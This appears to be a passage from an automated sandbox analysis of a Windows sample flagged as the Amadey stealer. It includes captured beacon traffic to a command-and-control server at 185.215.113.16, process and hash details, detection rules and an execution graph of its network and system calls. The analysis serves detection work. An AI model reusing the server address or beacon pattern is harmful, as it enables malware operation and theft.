                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:55:14.263987064 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Fri, 27 Sep 2024 10:55:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0
                                      Sep 27, 2024 12:55:14.958365917 CEST306OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:55:16.055530071 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Fri, 27 Sep 2024 10:55:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0
                                      Sep 27, 2024 12:55:16.161581039 CEST306OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:55:19.707447052 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Fri, 27 Sep 2024 10:55:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0
                                      Sep 27, 2024 12:55:26.871474028 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Fri, 27 Sep 2024 10:55:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.949713185.215.113.16808080C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 27, 2024 12:55:21.792572021 CEST306OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.949715185.215.113.16808080C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 27, 2024 12:55:32.993370056 CEST306OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.949721185.215.113.16808080C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 27, 2024 12:55:58.525943995 CEST306OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:56:01.646148920 CEST306OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.949722185.215.113.16808080C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 27, 2024 12:56:02.682647943 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Sep 27, 2024 12:56:02.942955017 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Sep 27, 2024 12:56:03.255420923 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Sep 27, 2024 12:56:03.864888906 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Sep 27, 2024 12:56:05.067892075 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Sep 27, 2024 12:56:06.290822983 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:06:54:01
                                      Start date:27/09/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0x10000
                                      File size:1'942'016 bytes
                                      MD5 hash:E3AA1042729BC6D0DDBED39DDB48B872
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1378088248.0000000005200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1418313558.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:06:54:04
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                                      Imagebase:0x400000
                                      File size:1'942'016 bytes
                                      MD5 hash:E3AA1042729BC6D0DDBED39DDB48B872
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1403500499.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1443822866.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 53%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:06:55:00
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      Imagebase:0x400000
                                      File size:1'942'016 bytes
                                      MD5 hash:E3AA1042729BC6D0DDBED39DDB48B872
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.1963827399.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 05410BDB Relevance: .1, Instructions: 102COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1421037272.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5410000_file.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7694e231f0618dfe902794b0dd227d037a90fd9159e4fd9d88547ab0b560cbe
                                        • Instruction ID: ac6e51573c784024cb39cc90de88328b0617641c2deb4478a2ed8ee995971c21
                                        • Opcode Fuzzy Hash: b7694e231f0618dfe902794b0dd227d037a90fd9159e4fd9d88547ab0b560cbe
                                        • Instruction Fuzzy Hash: C71181FB14C115BF6146C1456B18AFA2AAFE6D33707308467FC0ADA501F6954ACB5439
                                        Function 05410BEB Relevance: .1, Instructions: 101COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1421037272.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5410000_file.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b9834fa798203f10496b9ca531c29cca40bce0f7d9d7a6d9fc1b1f22b4afcb5
                                        • Instruction ID: bf29bdb38b170428b469037fa4d8c740200041101c2107a95d95399b6cc9a317
                                        • Opcode Fuzzy Hash: 1b9834fa798203f10496b9ca531c29cca40bce0f7d9d7a6d9fc1b1f22b4afcb5
                                        • Instruction Fuzzy Hash: 0911B2FB04C115BFA186C1416B18AFB2AAFE6D33707308467FC0ADA901F2950ECB6439
                                        Function 05410BF5 Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1421037272.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5410000_file.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 296fb1fca03bf9e1abd23a7726f4f2fd6a851276a37a2cefb5b849b731abe10c
                                        • Instruction ID: 88b5a98cd5fe05f8fb5f4396352de7570cd930a4cb6687385feddccd3856f806
                                        • Opcode Fuzzy Hash: 296fb1fca03bf9e1abd23a7726f4f2fd6a851276a37a2cefb5b849b731abe10c
                                        • Instruction Fuzzy Hash: A311E2FB04C214BFA186C5456B18AFB2ABFE6D33703308423FC0AD6502F2950ACA6439
                                        Function 05410C11 Relevance: .1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1421037272.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5410000_file.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23e7eec4b77c982255fbcff7de8c5e78ccbae789abae187d21a1f0bac7635fba
                                        • Instruction ID: e0a1a43c8215942224d87b923770caaf9bf51347ef116cb090781d59dbebe8d0
                                        • Opcode Fuzzy Hash: 23e7eec4b77c982255fbcff7de8c5e78ccbae789abae187d21a1f0bac7635fba
                                        • Instruction Fuzzy Hash: C81191FB04C214BFA146C1456B58AF72ABFE7D33707308423FD4A9AA42A6950ACA5439
                                        Function 05410C42 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1421037272.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5410000_file.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8aa049a9a09502c317f29128d1b2948261b6ef0d5676da05a6313d2199af1e7d
                                        • Instruction ID: d15fb5a3ec39b814ef976fcc7538204ebf2591cda80bdee6c26113f7f2e8dc3a
                                        • Opcode Fuzzy Hash: 8aa049a9a09502c317f29128d1b2948261b6ef0d5676da05a6313d2199af1e7d
                                        • Instruction Fuzzy Hash: 25019EFB14C114BFA286C1416B5CAFA2BBFE3D23707308417FC4A89501E6A54ACB6939
                                        Function 05410C96 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1421037272.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5410000_file.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c44b8bd0d81fedb90ecbebc094fabd97ae024307d4148851a2bb49e94e1d4f5f
                                        • Instruction ID: 8af2aaeaac238585bed0adb8a964a01983e4f0fa644c6f1383ed4180c95586fa
                                        • Opcode Fuzzy Hash: c44b8bd0d81fedb90ecbebc094fabd97ae024307d4148851a2bb49e94e1d4f5f
                                        • Instruction Fuzzy Hash: 02018FFB14D155AEB188D4426B5CAF62ABFE2D27707318917BC0AC5501B25949CB143D
                                        Function 05410C5D Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1421037272.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5410000_file.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 209a66eb2d9e1112da28b9ab4c60ea3ab826f7e11701ccc9a2d7428ba0361c37
                                        • Instruction ID: 99442ec93eee773e636d41e72a987358afc8897346d2952f44500270557bea3d
                                        • Opcode Fuzzy Hash: 209a66eb2d9e1112da28b9ab4c60ea3ab826f7e11701ccc9a2d7428ba0361c37
                                        • Instruction Fuzzy Hash: C301ADFB14D115AEB184C4826B1CAFB2AAFE3D27707328917FC0AC6900B2594ACB1439
                                        Function 05410CAC Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1421037272.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5410000_file.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 27b848fddbf4990639104af78f18eee9c34ab2614cea0af21485187754f04cd8
                                        • Instruction ID: b0363bf97abf0ed6c106a07400646ab98902cde0a078e853e9938244a0296d7d
                                        • Opcode Fuzzy Hash: 27b848fddbf4990639104af78f18eee9c34ab2614cea0af21485187754f04cd8
                                        • Instruction Fuzzy Hash: CBF0C8FB14C010AFB245C5566A5C6FA17AEE5D23703308A57FD0EC5545E64A0ACB253A
                                        Function 05410C83 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1421037272.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5410000_file.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 231368c1cd61183328738cd8f988f1b3f9ff47114a4cc394c35fe4b9a326e5b0
                                        • Instruction ID: 2916337b7263e62ac8717a2557c917b501121a04ce407307bf0500f850645297
                                        • Opcode Fuzzy Hash: 231368c1cd61183328738cd8f988f1b3f9ff47114a4cc394c35fe4b9a326e5b0
                                        • Instruction Fuzzy Hash: 16F067FB14D218AEB184D1826B1CBFB16BEE3D23707318517FD4AC5941A2990ACB653A
                                        Function 05410CC9 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1421037272.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5410000_file.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f6b5eb77e31229e4f1b34e35dda6422c97f7959a9926d4294bd79d9d01f60fe2
                                        • Instruction ID: d0493284e9fdd3da9f122304c7c5cef57af84b34168957d78da613271d81d998
                                        • Opcode Fuzzy Hash: f6b5eb77e31229e4f1b34e35dda6422c97f7959a9926d4294bd79d9d01f60fe2
                                        • Instruction Fuzzy Hash: E0E06DFB14D015AEB285C0467B18AFB672EE1D17707308523F80BC5501E60A068F6036

                                        Execution Graph

                                        Execution Coverage:9.3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:5.2%
                                        Total number of Nodes:555
                                        Total number of Limit Nodes:28
                                        execution_graph 12708 407400 12710 407435 shared_ptr 12708->12710 12709 40752f shared_ptr 12710->12709 12714 41d041 12710->12714 12712 4075bd 12712->12709 12718 41cff7 12712->12718 12715 41d051 12714->12715 12716 41d05a 12715->12716 12722 41d0c9 12715->12722 12716->12712 12719 41d007 12718->12719 12720 41d0af 12719->12720 12721 41d0ab RtlWakeAllConditionVariable 12719->12721 12720->12709 12721->12709 12723 41d0d7 SleepConditionVariableCS 12722->12723 12725 41d0f0 12722->12725 12723->12725 12725->12715 12764 416ae0 12765 416b10 12764->12765 12768 4146c0 12765->12768 12767 416b5c Sleep 12767->12765 12771 4146fb 12768->12771 12785 414a72 shared_ptr 12768->12785 12769 414e69 shared_ptr 12769->12767 12771->12785 12787 40bd60 12771->12787 12773 414f25 shared_ptr 12774 414fee shared_ptr 12773->12774 12778 416ab6 12773->12778 12806 407d00 12774->12806 12776 414ffd 12812 4082b0 12776->12812 12779 4146c0 11 API calls 12778->12779 12781 416b5c Sleep 12779->12781 12780 414a0d 12782 40bd60 5 API calls 12780->12782 12780->12785 12781->12778 12782->12785 12783 414753 shared_ptr __dosmaperr 12783->12780 12784 438979 4 API calls 12783->12784 12784->12780 12785->12769 12798 4065b0 12785->12798 12786 415016 shared_ptr 12786->12767 12788 40bdb2 12787->12788 12791 40c14e shared_ptr 12787->12791 12789 40bdc6 InternetOpenW InternetConnectA 12788->12789 12788->12791 12790 40be3d 12789->12790 12792 40be53 HttpOpenRequestA 12790->12792 12791->12783 12793 40be71 shared_ptr 12792->12793 12794 40bf13 HttpSendRequestA 12793->12794 12796 40bf2b shared_ptr 12794->12796 12795 40bfb3 InternetReadFile 12797 40bfda 12795->12797 12796->12795 12799 40660f 12798->12799 12816 402280 12799->12816 12801 406699 shared_ptr 12802 402280 4 API calls 12801->12802 12803 406822 shared_ptr 12801->12803 12804 406727 shared_ptr 12802->12804 12803->12773 12804->12803 12805 402280 4 API calls 12804->12805 12805->12804 12807 407d66 shared_ptr __cftof 12806->12807 12808 407ea3 GetNativeSystemInfo 12807->12808 12809 407ea7 12807->12809 12811 407eb8 shared_ptr 12807->12811 12808->12809 12809->12811 12900 438a81 12809->12900 12811->12776 12814 408315 shared_ptr __cftof 12812->12814 12813 408454 GetNativeSystemInfo 12815 408333 12813->12815 12814->12813 12814->12815 12815->12786 12819 402240 12816->12819 12820 402256 12819->12820 12823 438667 12820->12823 12826 437456 12823->12826 12825 402264 12825->12801 12827 437496 12826->12827 12831 43747e __cftof __dosmaperr 12826->12831 12828 43683a __fassign 4 API calls 12827->12828 12827->12831 12829 4374ae 12828->12829 12832 437a11 12829->12832 12831->12825 12834 437a22 12832->12834 12833 437a31 __cftof __dosmaperr 12833->12831 12834->12833 12839 437fb5 12834->12839 12844 437c0f 12834->12844 12849 437c35 12834->12849 12859 437d83 12834->12859 12840 437fc5 12839->12840 12841 437fbe 12839->12841 12840->12834 12868 43799d 12841->12868 12843 437fc4 12843->12834 12845 437c18 12844->12845 12847 437c1f 12844->12847 12846 43799d 4 API calls 12845->12846 12848 437c1e 12846->12848 12847->12834 12848->12834 12851 437c56 __cftof __dosmaperr 12849->12851 12852 437c3c 12849->12852 12850 437db6 12857 437dc4 12850->12857 12858 437dd8 12850->12858 12876 43808e 12850->12876 12851->12834 12852->12850 12852->12851 12854 437def 12852->12854 12852->12857 12854->12858 12872 4381dd 12854->12872 12857->12858 12880 438537 12857->12880 12858->12834 12860 437d9c 12859->12860 12861 437db6 12859->12861 12860->12861 12864 437def 12860->12864 12866 437dc4 12860->12866 12862 437dd8 12861->12862 12863 43808e 4 API calls 12861->12863 12861->12866 12862->12834 12863->12866 12864->12862 12865 4381dd 4 API calls 12864->12865 12865->12866 12866->12862 12867 438537 4 API calls 12866->12867 12867->12862 12869 4379af __dosmaperr 12868->12869 12870 438979 4 API calls 12869->12870 12871 4379d2 __dosmaperr 12870->12871 12871->12843 12873 4381f8 12872->12873 12874 43822a 12873->12874 12884 43c65f 12873->12884 12874->12857 12877 4380a7 12876->12877 12887 43d199 12877->12887 12879 43815a 12879->12857 12879->12879 12881 4385aa 12880->12881 12883 438554 12880->12883 12881->12858 12882 43c65f __cftof 4 API calls 12882->12883 12883->12881 12883->12882 12885 43c504 __cftof GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12884->12885 12886 43c677 12885->12886 12886->12874 12888 43d1a9 __cftof __dosmaperr 12887->12888 12889 43d1bf 12887->12889 12888->12879 12889->12888 12890 43d256 12889->12890 12891 43d25b 12889->12891 12892 43d2b5 12890->12892 12893 43d27f 12890->12893 12894 43c9b0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12891->12894 12897 43ccc9 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12892->12897 12895 43d284 12893->12895 12896 43d29d 12893->12896 12894->12888 12898 43d00f GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12895->12898 12899 43ceb3 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 12896->12899 12897->12888 12898->12888 12899->12888 12901 4386d7 4 API calls 12900->12901 12902 438a9f 12901->12902 12902->12811 12952 41a140 12953 41a1c0 12952->12953 12959 417040 12953->12959 12955 41a1fc shared_ptr 12956 41a3ee shared_ptr 12955->12956 12963 403ea0 12955->12963 12958 41a3d6 12961 417081 __cftof __Mtx_init_in_situ 12959->12961 12960 4172b6 12960->12955 12961->12960 12969 402e80 12961->12969 12964 403f08 12963->12964 12967 403ede 12963->12967 12965 403f18 12964->12965 13012 402bc0 12964->13012 12965->12958 12967->12958 12970 402ec6 12969->12970 12972 402f2f 12969->12972 12971 41c5dc GetSystemTimePreciseAsFileTime 12970->12971 12973 402ed2 12971->12973 12979 41c5dc GetSystemTimePreciseAsFileTime 12972->12979 12988 402faf 12972->12988 12974 402edd __Mtx_unlock 12973->12974 12975 402fde 12973->12975 12974->12972 12977 402fe4 12974->12977 12976 41c19a 10 API calls 12975->12976 12976->12977 12978 41c19a 10 API calls 12977->12978 12980 402f79 12978->12980 12979->12980 12981 41c19a 10 API calls 12980->12981 12982 402f80 __Mtx_unlock 12980->12982 12981->12982 12983 41c19a 10 API calls 12982->12983 12984 